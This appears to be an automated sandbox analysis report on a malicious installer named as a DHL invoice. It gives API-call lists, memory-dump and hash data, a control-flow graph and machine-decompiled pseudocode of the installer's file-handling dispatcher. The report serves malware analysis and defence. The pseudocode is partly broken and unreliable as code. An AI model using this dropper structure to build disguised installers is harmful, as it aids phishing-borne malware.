                                                                            • RegisterClassW.USER32(004349A0), ref: 00405BF3
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405C0A
                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C3F
                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00405C71
                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004349A0), ref: 00405C9C
                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004349A0), ref: 00405CA9
                                                                            • RegisterClassW.USER32(004349A0), ref: 00405CB6
                                                                            • DialogBoxParamW.USER32(?,00000000,00404F92,00000000), ref: 00405CD1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\mnstring$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$Somatopleural Setup: Installing$_Nb
                                                                            • API String ID: 606308-4219778767
                                                                            • Opcode ID: a27ea127888db64f7d6294d20d6e234172cb57f21fc50ad571c48084d45d65b5
                                                                            • Instruction ID: 6fb6b78dff8dcbba7a007941f02a836e4a1cfbcf653c0408c2f56a309db5e394
                                                                            • Opcode Fuzzy Hash: a27ea127888db64f7d6294d20d6e234172cb57f21fc50ad571c48084d45d65b5
                                                                            • Instruction Fuzzy Hash: 7061E4B1201605BEE610AB75AD45F7B36ACEF80358F50453BF901B61E2DB79AC108F6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 381 40154a-4015bd 382 402ea1 381->382 383 4015c3-4015c7 381->383 384 402ea5 382->384 385 4016c1-4016cf 383->385 386 4017c2-401e9e call 40303e call 4065cf 383->386 387 401684-4016aa 383->387 388 4015e6-4015ee 383->388 389 4018cb-4018d4 call 40303e call 406a56 383->389 390 40160c-40160d 383->390 391 4015ce-4015d0 383->391 392 4016ef-4016fb call 40303e SetFileAttributesW 383->392 393 4016af-4016bc call 40661f 383->393 394 40182f-40184b call 40303e GetFullPathNameW 383->394 395 401711-401728 call 40303e call 406bc5 383->395 396 401633-40163a SetForegroundWindow 383->396 397 4017d3-4017f6 call 40303e * 3 MoveFileW 383->397 398 4015d5-4015d6 383->398 399 401618-40162e call 403002 Sleep 383->399 400 4015f9-401607 call 4030fd call 401399 383->400 401 40189b-4018b8 call 40303e SearchPathW 383->401 402 4018de-401904 call 40303e call 406e03 383->402 403 40163f-401645 383->403 404 402eab 384->404 412 4016d1-4016d5 ShowWindow 385->412 413 4016d9-4016e0 385->413 478 401bb2-401bb6 386->478 479 401ea4-401ea8 386->479 410 402ead-402eb7 387->410 416 4015f0-4015f7 PostQuitMessage 388->416 417 4015dc-4015e1 388->417 454 4018d9 389->454 424 40160e-401613 call 405d3a 390->424 391->410 447 401701-401703 392->447 393->382 445 401857-40185d 394->445 446 40184d-401855 394->446 470 401784-40178e 395->470 471 40172a-40173f call 4065f6 395->471 396->382 481 401804-401808 397->481 482 4017f8-4017ff 397->482 414 4015d7 call 405d3a 398->414 399->382 400->410 401->382 451 4018be-4018c6 401->451 465 401906-40190c call 406b1a 402->465 466 40190e-401920 call 406b1a call 406556 lstrcatW 402->466 407 401671-40167f 403->407 408 401647 403->408 404->410 407->382 427 401657-40166c call 403002 408->427 428 401649-401650 408->428 412->413 413->382 431 4016e6-4016ea ShowWindow 413->431 414->417 416->417 417->410 424->382 427->382 428->427 431->382 458 40187b 445->458 459 40185f-401862 445->459 457 40187f-401883 446->457 447->382 460 401709-40170c 447->460 451->384 454->447 457->384 468 401889-401896 GetShortPathNameW 457->468 458->457 459->458 467 401864-40186c call 4065cf 459->467 460->384 491 401925-40192d call 406d3d 465->491 466->491 467->446 494 40186e-401876 call 406b1a 467->494 468->384 475 401790-4017ab call 405d3a call 406b1a SetCurrentDirectoryW 470->475 476 4017bb-4017bd 470->476 488 401741-401745 471->488 489 401758-401759 call 405e1e 471->489 475->382 512 4017b1-4017b6 475->512 476->424 478->410 479->410 481->460 490 40180e-401816 call 4065cf 481->490 482->424 488->489 495 401747-40174e call 4064fc 488->495 504 40175e-401760 489->504 490->460 508 40181c-40182a call 40623d 490->508 511 40192e-401931 491->511 494->458 495->489 513 401750-401751 call 405e3e 495->513 509 401762-401767 504->509 510 401775-40177e 504->510 508->424 515 401774 509->515 516 401769-401772 GetFileAttributesW 509->516 510->471 517 401780 510->517 518 401933-40193d call 4065cf 511->518 519 401964-401966 511->519 512->382 525 401756 513->525 515->510 516->510 516->515 517->470 529 401950-401960 518->529 530 40193f-40194e CompareFileTime 518->530 523 401968-401969 call 406b9d 519->523 524 40196e-401989 call 40691b 519->524 523->524 532 401a18-401a49 call 405d3a call 403148 524->532 533 40198f-401991 524->533 525->504 529->519 530->529 546 401a52-401a5a SetFileTime 532->546 547 401a4b-401a50 532->547 535 401993-4019df call 406b1a * 2 call 405eba call 406b1a call 406aa8 533->535 536 4019fd-401a13 call 405d3a 533->536 535->511 564 4019e5-4019e8 535->564 536->384 549 401a60-401a6d CloseHandle 546->549 547->546 547->549 549->382 551 401a73-401a76 549->551 553 401a78-401a87 call 405eba lstrcatW 551->553 554 401a89-401a8c call 405eba 551->554 560 401a91-401a9c call 406aa8 553->560 554->560 560->417 560->478 565 4019f2-4019f8 564->565 566 4019ea-4019ed 564->566 565->404 566->414
                                                                            C-Code - Quality: 78%
                                                                            			E0040154A(void* _a4) {
                                                                            				char _v548;
                                                                            				struct _WIN32_FIND_DATAW _v596;
                                                                            				void* _v620;
                                                                            				void* _v624;
                                                                            				void* _v638;
                                                                            				signed int _v640;
                                                                            				signed int _v644;
                                                                            				signed int _v648;
                                                                            				int _v652;
                                                                            				WCHAR* _v656;
                                                                            				short _v660;
                                                                            				short _v664;
                                                                            				RECT* _v668;
                                                                            				int _v672;
                                                                            				struct _FILETIME _v680;
                                                                            				int _v684;
                                                                            				int _v688;
                                                                            				signed int _v692;
                                                                            				void _v696;
                                                                            				int _v700;
                                                                            				int _v704;
                                                                            				int _v708;
                                                                            				RECT* _v712;
                                                                            				char _v716;
                                                                            				signed int _v720;
                                                                            				RECT* _v724;
                                                                            				signed int _v728;
                                                                            				WCHAR* _v732;
                                                                            				int _v736;
                                                                            				intOrPtr _v740;
                                                                            				intOrPtr _v744;
                                                                            				void* _v752;
                                                                            				int _v756;
                                                                            				intOrPtr _v760;
                                                                            				int _v764;
                                                                            				void* _v768;
                                                                            				int _v776;
                                                                            				void* _v784;
                                                                            				void* _v792;
                                                                            				void* _v796;
                                                                            				signed int _t453;
                                                                            				char _t457;
                                                                            				signed int _t459;
                                                                            				signed int _t461;
                                                                            				char* _t463;
                                                                            				int _t466;
                                                                            
                                                                            				_t459 = 7;
                                                                            				_v700 =  *0x4349f8;
                                                                            				memcpy( &_v696, _a4, _t459 << 2);
                                                                            				_t461 = _v692;
                                                                            				_t463 = L"user32::EnumWindows(i r1 ,i 0)";
                                                                            				_t453 = _v688;
                                                                            				_v652 = _t461;
                                                                            				_v704 = _t463 + (_t461 << 0xb);
                                                                            				 *0x40b104 =  &_v692;
                                                                            				_t466 = _v696 + 0xfffffffe;
                                                                            				_v716 = 0;
                                                                            				_v708 = _t466;
                                                                            				_v668 = _t453;
                                                                            				_v712 = _t463 + (_t453 << 0xb);
                                                                            				if(_t466 > 0x43) {
                                                                            					L391:
                                                                            					_t457 = _v716;
                                                                            					L392:
                                                                            					 *0x435ac8 =  *0x435ac8 + _t457;
                                                                            					L393:
                                                                            					return 0;
                                                                            				}
                                                                            				switch( *((intOrPtr*)(_v708 * 4 +  &M00402EBA))) {
                                                                            					case 0:
                                                                            						return _t461;
                                                                            					case 1:
                                                                            						_push(0);
                                                                            						_push(__ecx);
                                                                            						goto L4;
                                                                            					case 2:
                                                                            						 *0x4349ec =  *0x4349ec + 1;
                                                                            						__eflags = __edx;
                                                                            						if(__edx != 0) {
                                                                            							PostQuitMessage(0);
                                                                            						}
                                                                            						goto L5;
                                                                            					case 3:
                                                                            						E004030FD(__ecx) = __eax - 1;
                                                                            						_push(0);
                                                                            						return __eax;
                                                                            					case 4:
                                                                            						_push(0);
                                                                            						_push(__ecx);
                                                                            						goto L10;
                                                                            					case 5:
                                                                            						__eax = E00403002(0);
                                                                            						0 = 1;
                                                                            						__eflags = __eax - 1;
                                                                            						__ecx =  >  ? __eax : 1;
                                                                            						Sleep( >  ? __eax : 1);
                                                                            						goto L391;
                                                                            					case 6:
                                                                            						__eax = SetForegroundWindow(__edx);
                                                                            						goto L391;
                                                                            					case 7:
                                                                            						__edx =  *0x4349e4;
                                                                            						__esi = ShowWindow;
                                                                            						__eflags = __edx;
                                                                            						if(__edx != 0) {
                                                                            							__eax = ShowWindow(__edx, __eax); // executed
                                                                            							__ecx = _v692;
                                                                            						}
                                                                            						__eax =  *0x4349e8;
                                                                            						__eflags = __eax;
                                                                            						if(__eax != 0) {
                                                                            							__eax = ShowWindow(__eax, __ecx); // executed
                                                                            						}
                                                                            						goto L391;
                                                                            					case 8:
                                                                            						__eax = E0040303E(__edx, 0xfffffff0);
                                                                            						__eax = SetFileAttributesW(__eax, _v692);
                                                                            						goto L27;
                                                                            					case 9:
                                                                            						__edi = E0040303E(__edx, 0xfffffff0);
                                                                            						__eax = E00406BC5(__edi);
                                                                            						__ebx = _v724;
                                                                            						__esi = __eax;
                                                                            						__eflags = __esi;
                                                                            						if(__esi == 0) {
                                                                            							L41:
                                                                            							__eflags = _v688;
                                                                            							_push("C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp\System.dll");
                                                                            							if(_v688 == 0) {
                                                                            								_push(0xfffffff5);
                                                                            								goto L10;
                                                                            							} else {
                                                                            								_push(0xffffffe6);
                                                                            								E00405D3A() = E00406B1A(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring\\Forcible", __edi);
                                                                            								__eax = SetCurrentDirectoryW(__edi); // executed
                                                                            								__eflags = __eax;
                                                                            								if(__eax == 0) {
                                                                            									_v716 = 0;
                                                                            								}
                                                                            								goto L391;
                                                                            							}
                                                                            						} else {
                                                                            							goto L30;
                                                                            						}
                                                                            						L31:
                                                                            						__eflags = _v684;
                                                                            						if(_v684 == 0) {
                                                                            							goto L34;
                                                                            						}
                                                                            						__eax = E004064FC();
                                                                            						__eflags = __eax;
                                                                            						if(__eax != 0) {
                                                                            							__eax = E00405E3E(__edi); // executed
                                                                            							L35:
                                                                            							__eflags = __eax;
                                                                            							if(__eax == 0) {
                                                                            								L39:
                                                                            								 *__esi = __bp;
                                                                            								__esi = __esi + 2;
                                                                            								__eflags = __bp;
                                                                            								if(__bp != 0) {
                                                                            									L30:
                                                                            									__esi = E004065F6(__esi, 0x5c);
                                                                            									__eax = 0;
                                                                            									__ebp =  *__esi & 0x0000ffff;
                                                                            									 *__esi = __ax;
                                                                            									__eflags = __bp;
                                                                            									if(__bp != 0) {
                                                                            										goto L34;
                                                                            									}
                                                                            									goto L31;
                                                                            								} else {
                                                                            									_v716 = __ebx;
                                                                            									goto L41;
                                                                            								}
                                                                            							}
                                                                            							__eflags = __eax - 0xb7;
                                                                            							if(__eax != 0xb7) {
                                                                            								L38:
                                                                            								__ebx =  &(__ebx[0]);
                                                                            								__eflags = __ebx;
                                                                            								goto L39;
                                                                            							}
                                                                            							__eax = GetFileAttributesW(__edi); // executed
                                                                            							__eflags = __al & 0x00000010;
                                                                            							if((__al & 0x00000010) != 0) {
                                                                            								goto L39;
                                                                            							}
                                                                            							goto L38;
                                                                            						}
                                                                            						L34:
                                                                            						__eax = E00405E1E(__edi);
                                                                            						goto L35;
                                                                            					case 0xa:
                                                                            						__eax = E0040303E(__edx, 0);
                                                                            						__eax = E004065CF(__eax);
                                                                            						goto L176;
                                                                            					case 0xb:
                                                                            						__eax = _v684;
                                                                            						__eflags = _v684;
                                                                            						if(__eflags > 0) {
                                                                            							__eax =  *(0x435a80 + __ecx * 4);
                                                                            							 *(0x435ac0 + __ecx * 4) =  *(0x435a80 + __ecx * 4);
                                                                            						} else {
                                                                            							if(__eflags == 0) {
                                                                            								__eax =  *(0x435ac0 + __ecx * 4);
                                                                            								 *(0x435a80 + __ecx * 4) =  *(0x435ac0 + __ecx * 4);
                                                                            							}
                                                                            							0 = E00403002(1);
                                                                            							__eax = _v692;
                                                                            							 *(0x435ac0 + _v692 * 4) = __ecx;
                                                                            						}
                                                                            						goto L391;
                                                                            					case 0xc:
                                                                            						__ecx = _v684;
                                                                            						_push(4);
                                                                            						__edx =  *(0x435ac0 + __ecx * 4);
                                                                            						__edx = __edx & _v680.dwLowDateTime;
                                                                            						 *(0x435ac0 + __ecx * 4) = __edx & _v680.dwLowDateTime;
                                                                            						__eax = 0;
                                                                            						__eflags = __edx;
                                                                            						_pop(__ecx);
                                                                            						 ==  ? 0 : 0 =  *((intOrPtr*)(__esp + ( ==  ? 0 : 0) + 0x28));
                                                                            						return  *((intOrPtr*)(__esp + ( ==  ? 0 : 0) + 0x28));
                                                                            					case 0xd:
                                                                            						_push( *((intOrPtr*)(0x435ac0 + __eax * 4)));
                                                                            						goto L20;
                                                                            					case 0xe:
                                                                            						__esi = E0040303E(__edx, 0xffffffd0);
                                                                            						__edi = E0040303E(__edx, 0xffffffdf);
                                                                            						__eax = E0040303E(__edx, 0x13);
                                                                            						__eax = MoveFileW(__esi, __edi);
                                                                            						__eflags = __eax;
                                                                            						if(__eax == 0) {
                                                                            							__eflags = _v684;
                                                                            							if(_v684 == 0) {
                                                                            								goto L28;
                                                                            							}
                                                                            							__eax = E004065CF(__esi);
                                                                            							__eflags = __eax;
                                                                            							if(__eax == 0) {
                                                                            								goto L28;
                                                                            							} else {
                                                                            								__eax = E0040623D(__esi, __edi);
                                                                            								_push("C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp\System.dll");
                                                                            								_push(0xffffffe4);
                                                                            								goto L10;
                                                                            							}
                                                                            						} else {
                                                                            							_push("C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp\System.dll");
                                                                            							_push(0xffffffe3);
                                                                            							L10:
                                                                            							__eax = E00405D3A();
                                                                            							goto L391;
                                                                            						}
                                                                            					case 0xf:
                                                                            						__edi = E0040303E(__edx, 0);
                                                                            						__eax =  &_v716;
                                                                            						__eax = GetFullPathNameW(__edi, 0x400, __esi,  &_v716);
                                                                            						__eflags = __eax;
                                                                            						if(__eax != 0) {
                                                                            							__eax = _v712;
                                                                            							__eflags = __eax - __edi;
                                                                            							if(__eax <= __edi) {
                                                                            								L57:
                                                                            								__ebx = _v716;
                                                                            								L58:
                                                                            								__eflags = _v684 - __ebp;
                                                                            								if(_v684 == __ebp) {
                                                                            									__eax = GetShortPathNameW(__esi, __esi, 0x400);
                                                                            								}
                                                                            								goto L392;
                                                                            							}
                                                                            							__eflags =  *__eax - __bp;
                                                                            							if( *__eax == __bp) {
                                                                            								goto L57;
                                                                            							}
                                                                            							__eax = E004065CF(__edi);
                                                                            							__eflags = __eax;
                                                                            							if(__eax == 0) {
                                                                            								goto L52;
                                                                            							} else {
                                                                            								__eflags = __eax;
                                                                            								__eax = E00406B1A(_v712, __eax);
                                                                            								goto L57;
                                                                            							}
                                                                            						}
                                                                            						L52:
                                                                            						0 = 1;
                                                                            						__eax = 0;
                                                                            						 *__esi = __ax;
                                                                            						goto L58;
                                                                            					case 0x10:
                                                                            						__eax = E0040303E(__edx, 0xffffffff);
                                                                            						__ecx =  &_v656;
                                                                            						__eax = SearchPathW(0, __eax, 0, 0x400, __edi,  &_v656);
                                                                            						__eflags = __eax;
                                                                            						if(__eax != 0) {
                                                                            							goto L391;
                                                                            						}
                                                                            						goto L61;
                                                                            					case 0x11:
                                                                            						__eax = E0040303E(__edx, 0xffffffef);
                                                                            						__eax = E00406A56(__ecx, __edi, __eax); // executed
                                                                            						goto L27;
                                                                            					case 0x12:
                                                                            						__eax = E0040303E(__edx, 0x31);
                                                                            						__ebx = _v696;
                                                                            						__esi = __eax;
                                                                            						__ebx = _v696 & 0x00000007;
                                                                            						_v708 = __esi;
                                                                            						_v716 = __ebx;
                                                                            						__eax = E00406E03(__esi);
                                                                            						__edi = L"Call";
                                                                            						_push(__esi);
                                                                            						__eflags = __eax;
                                                                            						if(__eax == 0) {
                                                                            							__eax = E00406B1A(__edi, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring\\Forcible");
                                                                            							__eax = lstrcatW(__eax, ??);
                                                                            						} else {
                                                                            							_push(__edi);
                                                                            							__eax = E00406B1A();
                                                                            						}
                                                                            						__eax = E00406D3D(__edi);
                                                                            						__esi = 0;
                                                                            						__esi = 1;
                                                                            						__eflags = 1;
                                                                            						do {
                                                                            							__eflags = __ebx - 3;
                                                                            							if(__ebx < 3) {
                                                                            								L71:
                                                                            								__eflags = __ebx;
                                                                            								if(__ebx == 0) {
                                                                            									__eax = E00406B9D(__edi);
                                                                            								}
                                                                            								__eax = 0;
                                                                            								__eflags = __ebx - __esi;
                                                                            								0 | __eflags != 0x00000000 = (__eflags != 0) + 1;
                                                                            								__eax = E0040691B(__edi, 0x40000000, (__eflags != 0) + 1);
                                                                            								_v720 = __eax;
                                                                            								__eflags = __eax - 0xffffffff;
                                                                            								if(__eax != 0xffffffff) {
                                                                            									__esi = _v704;
                                                                            									__eax = E00405D3A(0xffffffea, __esi);
                                                                            									__ebx = _v716;
                                                                            									 *0x435af4 =  *0x435af4 + 1;
                                                                            									__eax = E00403148(_v692, __ebx, __ebp, __ebp);
                                                                            									 *0x435af4 =  *0x435af4 - 1;
                                                                            									__eflags = _v704 - 0xffffffff;
                                                                            									_v732 = __eax;
                                                                            									if(_v704 != 0xffffffff) {
                                                                            										L83:
                                                                            										 &_v680 = SetFileTime(0,  &_v680, __ebp,  &_v680); // executed
                                                                            										L84:
                                                                            										__eax = CloseHandle(__ebx); // executed
                                                                            										__eax = _v708;
                                                                            										__eflags = __eax;
                                                                            										if(__eax >= 0) {
                                                                            											goto L391;
                                                                            										}
                                                                            										__eflags = __eax - 0xfffffffe;
                                                                            										if(__eax != 0xfffffffe) {
                                                                            											_push(0xffffffee);
                                                                            											_push(__edi);
                                                                            											__eax = E00405EBA();
                                                                            										} else {
                                                                            											_push(0xffffffe9);
                                                                            											_push(__edi);
                                                                            											E00405EBA() = lstrcatW(__edi, __esi);
                                                                            										}
                                                                            										_push(0x200010);
                                                                            										_push(__edi);
                                                                            										goto L89;
                                                                            									}
                                                                            									__eflags = _v680.dwHighDateTime - 0xffffffff;
                                                                            									if(_v680.dwHighDateTime == 0xffffffff) {
                                                                            										goto L84;
                                                                            									}
                                                                            									goto L83;
                                                                            								} else {
                                                                            									__eflags = __ebx;
                                                                            									if(__ebx != 0) {
                                                                            										__esi = _v704;
                                                                            										__eax = E00405D3A(0xffffffe2, _v704);
                                                                            										__ebx = 0;
                                                                            										__eflags = _v720 - 2;
                                                                            										goto L80;
                                                                            									}
                                                                            									goto L75;
                                                                            								}
                                                                            							}
                                                                            							__eax = E004065CF(__edi);
                                                                            							__ecx = __ebp;
                                                                            							__eflags = __eax;
                                                                            							if(__eax != 0) {
                                                                            								__ecx =  &_v680;
                                                                            								__eax = __eax + 0x14;
                                                                            								__eflags = __eax;
                                                                            								0 = __eax;
                                                                            							}
                                                                            							__ebx =  &(__ebx[0xffffffffffffffff]);
                                                                            							__ebx = __ebx | 0x80000000;
                                                                            							__ebx = __ebx & __ecx;
                                                                            							__ebx =  ~__ebx;
                                                                            							asm("sbb ebx, ebx");
                                                                            							__ebx =  &(__ebx[0]);
                                                                            							__eflags = __ebx;
                                                                            							_v712 = __ebx;
                                                                            							goto L71;
                                                                            							L75:
                                                                            							E00406B1A("C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp", L"user32::EnumWindows(i r1 ,i 0)") = E00406B1A(L"user32::EnumWindows(i r1 ,i 0)", __edi);
                                                                            							_push(_v688);
                                                                            							_push("C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp\System.dll");
                                                                            							E00405EBA() = E00406B1A(L"user32::EnumWindows(i r1 ,i 0)", "C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp");
                                                                            							_v724 = _v724 >> 3;
                                                                            							__eax = E00406AA8("C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp\System.dll", _v724 >> 3);
                                                                            							__eax = __eax - 4;
                                                                            							__eflags = __eax;
                                                                            						} while (__eax == 0);
                                                                            						__eax = __eax - 1;
                                                                            						__eflags = __eax;
                                                                            						if(__eax == 0) {
                                                                            							 *0x435ac8 =  *0x435ac8 + 1;
                                                                            							goto L393;
                                                                            						}
                                                                            						_push(__edi);
                                                                            						_push(0xfffffffa);
                                                                            						L4:
                                                                            						__eax = E00405D3A();
                                                                            						goto L5;
                                                                            					case 0x13:
                                                                            						_push(0);
                                                                            						goto L91;
                                                                            					case 0x14:
                                                                            						__eax = E0040303E(__edx, 0x31);
                                                                            						__eax = E00406AA8(__eax, _v696);
                                                                            						__eflags = __eax;
                                                                            						if(__eax == 0) {
                                                                            							goto L28;
                                                                            						}
                                                                            						__eflags = __eax - _v684;
                                                                            						if(__eax == _v684) {
                                                                            							goto L122;
                                                                            						}
                                                                            						__eflags = __eax - _v680.dwHighDateTime;
                                                                            						if(__eax != _v680.dwHighDateTime) {
                                                                            							goto L391;
                                                                            						}
                                                                            						__eax = _v672;
                                                                            						return _v672;
                                                                            					case 0x15:
                                                                            						_push(0xfffffff0);
                                                                            						L91:
                                                                            						E0040303E(__edx) = E00406719(__eflags, __eax, _v692);
                                                                            						goto L391;
                                                                            					case 0x16:
                                                                            						__eax = E0040303E(__edx, 1);
                                                                            						__eax = lstrlenW(__eax);
                                                                            						goto L98;
                                                                            					case 0x17:
                                                                            						0 = E00403002(2);
                                                                            						__esi = __edx;
                                                                            						__ebp = E00403002(3);
                                                                            						__eax = E0040303E(__edx, 1);
                                                                            						_v712 = __eax;
                                                                            						__eax = lstrlenW(__eax);
                                                                            						__ecx = 0;
                                                                            						__eflags = __esi;
                                                                            						 *__edi = __cx;
                                                                            						__ebx =  ==  ? __eax : __ebx;
                                                                            						__eflags = __ebx;
                                                                            						if(__ebx == 0) {
                                                                            							goto L391;
                                                                            						}
                                                                            						__eflags = __ebp;
                                                                            						if(__ebp >= 0) {
                                                                            							L102:
                                                                            							__eflags = __ebp - __eax;
                                                                            							__ebp =  >  ? __eax : __ebp;
                                                                            							_v708 = _v708 + __ebp * 2;
                                                                            							__eax = E00406B1A(__edi, _v708 + __ebp * 2);
                                                                            							__eflags = __ebx;
                                                                            							if(__ebx < 0) {
                                                                            								0 = 0 + lstrlenW(__edi);
                                                                            								__eflags = __ebx;
                                                                            							}
                                                                            							__eax = 0;
                                                                            							__eflags = __ebx;
                                                                            							__eax =  >=  ? __ebx : 0;
                                                                            							__ebx = _v716;
                                                                            							__eflags = __eax - 0x400;
                                                                            							if(__eax < 0x400) {
                                                                            								__ecx = 0;
                                                                            								 *(__edi + __eax * 2) = __cx;
                                                                            							}
                                                                            							goto L392;
                                                                            						}
                                                                            						__ebp = __ebp + __eax;
                                                                            						__eflags = __ebp;
                                                                            						if(__ebp < 0) {
                                                                            							goto L391;
                                                                            						}
                                                                            						goto L102;
                                                                            					case 0x18:
                                                                            						__esi = E0040303E(__edx, 0x20);
                                                                            						_push(E0040303E(__edx, 0x31));
                                                                            						_push(__esi);
                                                                            						__eflags = _v684;
                                                                            						if(_v684 != 0) {
                                                                            							__eax = lstrcmpW();
                                                                            						} else {
                                                                            							__eax = lstrcmpiW();
                                                                            						}
                                                                            						__eflags = __eax;
                                                                            						if(__eax != 0) {
                                                                            							goto L122;
                                                                            						} else {
                                                                            							goto L110;
                                                                            						}
                                                                            					case 0x19:
                                                                            						__esi = 0;
                                                                            						__esi = 1;
                                                                            						0 = E0040303E(__edx, 1);
                                                                            						__eax = ExpandEnvironmentStringsW(__ebx, __edi, 0x400);
                                                                            						__eflags = __eax;
                                                                            						if(__eax == 0) {
                                                                            							L114:
                                                                            							__eax = 0;
                                                                            							__ebx = __esi;
                                                                            							 *__edi = __ax;
                                                                            							L116:
                                                                            							__eax = 0;
                                                                            							 *(__edi + 0x7fe) = __ax;
                                                                            							goto L392;
                                                                            						}
                                                                            						__eflags = _v684;
                                                                            						if(_v684 == 0) {
                                                                            							L115:
                                                                            							__ebx = _v716;
                                                                            							goto L116;
                                                                            						}
                                                                            						__eax = lstrcmpW(__ebx, __edi);
                                                                            						__eflags = __eax;
                                                                            						if(__eax != 0) {
                                                                            							goto L115;
                                                                            						}
                                                                            						goto L114;
                                                                            					case 0x1a:
                                                                            						__esi = _v672;
                                                                            						__edi = E00403002(0);
                                                                            						__eax = E00403002(1);
                                                                            						__eflags = _v672;
                                                                            						if(_v672 != 0) {
                                                                            							__eflags = __edi - __eax;
                                                                            							if(__eflags >= 0) {
                                                                            								if(__eflags <= 0) {
                                                                            									goto L110;
                                                                            								}
                                                                            								L124:
                                                                            								__eax = _v680.dwHighDateTime;
                                                                            								return _v680.dwHighDateTime;
                                                                            							}
                                                                            							L122:
                                                                            							__eax = _v680.dwLowDateTime;
                                                                            							return _v680.dwLowDateTime;
                                                                            						}
                                                                            						__eflags = __edi - __eax;
                                                                            						if(__eflags < 0) {
                                                                            							goto L122;
                                                                            						}
                                                                            						if(__eflags <= 0) {
                                                                            							goto L110;
                                                                            						}
                                                                            						goto L124;
                                                                            					case 0x1b:
                                                                            						__ebx = 0;
                                                                            						__ebx = 1;
                                                                            						__esi = E00403002(1);
                                                                            						0 = E00403002(2);
                                                                            						__eax = _v680.dwLowDateTime;
                                                                            						__eflags = __eax - 0xd;
                                                                            						if(__eax > 0xd) {
                                                                            							L149:
                                                                            							__ebx = _v716;
                                                                            							L150:
                                                                            							__eax = E0040661F(__edi, __esi);
                                                                            							goto L392;
                                                                            						}
                                                                            						switch( *((intOrPtr*)(__eax * 4 +  &M00402FCA))) {
                                                                            							case 0:
                                                                            								__esi = __esi + __ecx;
                                                                            								goto L149;
                                                                            							case 1:
                                                                            								__esi = __esi - __ecx;
                                                                            								goto L149;
                                                                            							case 2:
                                                                            								__esi = __esi * __ecx;
                                                                            								goto L149;
                                                                            							case 3:
                                                                            								__eflags = __ecx;
                                                                            								if(__ecx == 0) {
                                                                            									goto L132;
                                                                            								}
                                                                            								__eax = __esi;
                                                                            								asm("cdq");
                                                                            								_t103 = __eax % __ecx;
                                                                            								__eax = __eax / __ecx;
                                                                            								__edx = _t103;
                                                                            								__esi = __eax;
                                                                            								goto L133;
                                                                            							case 4:
                                                                            								__esi = __esi | __ecx;
                                                                            								goto L149;
                                                                            							case 5:
                                                                            								__esi = __esi & __ecx;
                                                                            								goto L149;
                                                                            							case 6:
                                                                            								__esi = __esi ^ __ecx;
                                                                            								goto L149;
                                                                            							case 7:
                                                                            								__eax = 0;
                                                                            								__eflags = __esi;
                                                                            								__eax = 0 | __eflags == 0x00000000;
                                                                            								__esi = __eflags == 0;
                                                                            								goto L149;
                                                                            							case 8:
                                                                            								__eflags = __esi;
                                                                            								if(__esi == 0) {
                                                                            									goto L142;
                                                                            								}
                                                                            								goto L139;
                                                                            							case 9:
                                                                            								__eflags = __esi;
                                                                            								if(__esi == 0) {
                                                                            									L140:
                                                                            									__esi = __ebp;
                                                                            									goto L149;
                                                                            								}
                                                                            								L142:
                                                                            								__eflags = __ecx;
                                                                            								if(__ecx == 0) {
                                                                            									goto L140;
                                                                            								}
                                                                            								L139:
                                                                            								__esi = __ebx;
                                                                            								goto L149;
                                                                            							case 0xa:
                                                                            								__eflags = __ecx;
                                                                            								if(__ecx == 0) {
                                                                            									L132:
                                                                            									__esi = __ebp;
                                                                            									L133:
                                                                            									__ebx = 0;
                                                                            									__eflags = __ecx;
                                                                            									__ebx = 0 | __ecx == 0x00000000;
                                                                            									goto L150;
                                                                            								}
                                                                            								__eax = __esi;
                                                                            								asm("cdq");
                                                                            								_t111 = __eax % __ecx;
                                                                            								__eax = __eax / __ecx;
                                                                            								__edx = _t111;
